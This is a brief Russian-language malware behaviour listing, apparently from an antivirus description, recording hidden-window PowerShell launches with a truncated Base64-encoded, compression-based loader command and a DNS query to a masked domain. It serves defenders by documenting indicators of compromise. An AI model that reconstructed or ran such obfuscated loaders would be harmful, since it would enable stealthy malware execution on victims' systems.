Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABOAGUAdwAtAE8AYgBKAEUAYwB0ACAAcwBZAHMAVABlAG0ALgBpAE8ALgBjAE8AbQBQAHIARQBzAHMAaQBvAE4ALgBkAGUARgBsAEEAdABlAFMAVABSAEUAQQBNACgAIABbAEkAbwAuAG0AZQBNAG8AUgBZAFMAVAByAGUAQQBtAF0AIABbAEMATwBuAH...
- DNS ASK ap####dqweqwe.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABOAGUAdwAtAE8AYgBKAEUAYwB0ACAAcwBZAHMAVABlAG0ALgBpAE8ALgBjAE8AbQBQAHIARQBzAHMAaQBvAE4ALgBkAGUARgBsAEEAdABlAFMAVABSAEUAQQBNACgAIABbAEkAbwAuAG0AZQBNAG8AUgBZAFMAVAByAGUAQQBtAF0AIABbAEMATwBuAH...' (со скрытым окном)